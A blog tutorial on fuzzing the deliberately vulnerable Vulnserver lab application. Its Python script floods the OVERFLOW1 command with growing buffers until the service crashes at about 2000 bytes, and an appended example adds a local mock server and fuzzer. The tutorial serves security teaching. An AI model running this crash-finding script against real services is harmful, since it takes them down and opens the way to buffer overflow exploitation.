Greetings everyone! Today we will learn how to perform fuzzing. In our previous blog we discussed the basic structure of a buffer overflow; in this blog we start with fuzzing, using a suitable example.
What is Fuzzing?
Fuzzing, as used here, is an automated script that continuously sends ever larger buffers of bytes to the target application and watches when it stops responding, to check whether the application is vulnerable to a buffer overflow and at roughly what input size.
Vulnserver is running on port 9999.
Python code for fuzzing:
#!/usr/bin/python
import socket, time, sys

ip = "172.16.0.10"          # host running Vulnserver
port = 9999                 # Vulnserver's default port
timeout = 5

# Build 30 test strings of 100, 200, ... 3000 bytes
buffer = []
counter = 100
while len(buffer) < 30:
    buffer.append("A" * counter)
    counter += 100

# Send each string as the argument of the OVERFLOW1 command; the loop stops
# as soon as Vulnserver no longer accepts a connection (i.e. it has crashed),
# so the last size printed before the error is the one that broke it
for string in buffer:
    try:
        s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        s.settimeout(timeout)
        s.connect((ip, port))
        s.recv(1024)                          # read the welcome banner
        print("Fuzzing with %s bytes" % len(string))
        s.send(("OVERFLOW1 " + string + "\r\n").encode())
        s.recv(1024)                          # wait for the reply
        s.close()
    except:
        print("Could not connect to " + ip + ":" + str(port))
        sys.exit(0)
    time.sleep(1)
As above, we run the script and it starts sending packets continuously to Vulnserver. Here we observe that the script stopped at 2000 bytes because Vulnserver stopped responding.
Below I attached both screenshots: one of the script output and the second of the Vulnserver status.
In the other screenshot it is paused, as our vulnerable software is running under Immunity Debugger.
In the example scenario above we discussed how fuzzing works and how we can estimate the buffer size using fuzzing with a Python script.
In this fuzzing section we learned how to write a script and run it against an application to find a buffer overflow vulnerability.
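To show the mechanics end to end on one machine, here is an added example (not the original script and not Vulnserver's code): a constructed local TCP service that answers the OVERFLOW1 command until a payload of 2000 bytes or more arrives and then stops accepting connections, plus a fuzzer built on the same increasing-buffer loop that reports the last size that got a reply and the first size that got none. The mock server, its crash threshold and the function names are assumptions made for illustration.

```python
import socket
import threading

# Constructed stand-in for the target: answers OVERFLOW1 normally until a payload of
# crash_at bytes or more arrives, then stops accepting connections (Vulnserver "hung").
def start_mock_server(crash_at=2000):
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind(("127.0.0.1", 0))                    # any free port
    srv.listen(5)

    def serve():
        while True:
            try:
                conn, _ = srv.accept()
            except OSError:
                return                            # listener closed: service is "dead"
            with conn:
                conn.sendall(b"Welcome to the mock server\n")
                data = b""
                while not data.endswith(b"\r\n"):  # read one full command line
                    chunk = conn.recv(4096)
                    if not chunk:
                        break
                    data += chunk
                payload = data.partition(b" ")[2].rstrip(b"\r\n")
                if len(payload) >= crash_at:
                    srv.close()                   # "crash": no reply, no more connections
                    return
                conn.sendall(b"OVERFLOW1 COMPLETE\n")

    threading.Thread(target=serve, daemon=True).start()
    return srv.getsockname()[1]

def fuzz(ip, port, step=100, max_rounds=30, timeout=5):
    """Send OVERFLOW1 with 'A' * n for n = step, 2*step, ...; return (last_ok, crash_len):
    largest n that got a reply, first n with no reply (None if the service survived)."""
    last_ok, crash_len = 0, None
    for n in range(step, step * max_rounds + 1, step):
        try:
            with socket.create_connection((ip, port), timeout=timeout) as s:
                s.recv(1024)                      # banner
                s.sendall(b"OVERFLOW1 " + b"A" * n + b"\r\n")
                reply = s.recv(1024)              # b"" means the peer went away
        except OSError:                           # refused, reset or timed out
            reply = b""
        if not reply:
            crash_len = n
            break
        last_ok = n
    return last_ok, crash_len
```

Running `fuzz("127.0.0.1", start_mock_server())` returns `(1900, 2000)`: the last size that was answered and the size at which the service went silent, which is the same reading the screenshots give for Vulnserver.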
Thanks for reading... See you in another blog!
Author
Shubham Jaiswal
WEB VAPT (Intern)